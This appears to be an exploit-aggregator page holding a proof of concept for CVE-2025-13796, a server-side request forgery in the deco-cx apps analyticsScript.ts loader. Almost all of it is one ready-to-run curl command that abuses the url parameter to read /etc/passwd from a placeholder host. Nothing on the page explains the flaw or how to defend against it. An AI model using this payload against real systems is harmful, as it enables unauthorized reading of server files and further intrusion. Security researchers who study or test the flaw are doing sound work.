## https://sploitus.com/exploit?id=2002BA66-33F5-53FA-BA12-A0A0E20A2B8E
# CVE-2025-13796-PoC
deco-cx apps Parameter analyticsScript.ts AnalyticsScript server-side request forgery
**PoC**:
```
curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: x.x.x.x' \
$'http://x.x.x.x/live/invoke/website/loaders/analyticsScript.ts?url=file:///etc/passwd'
```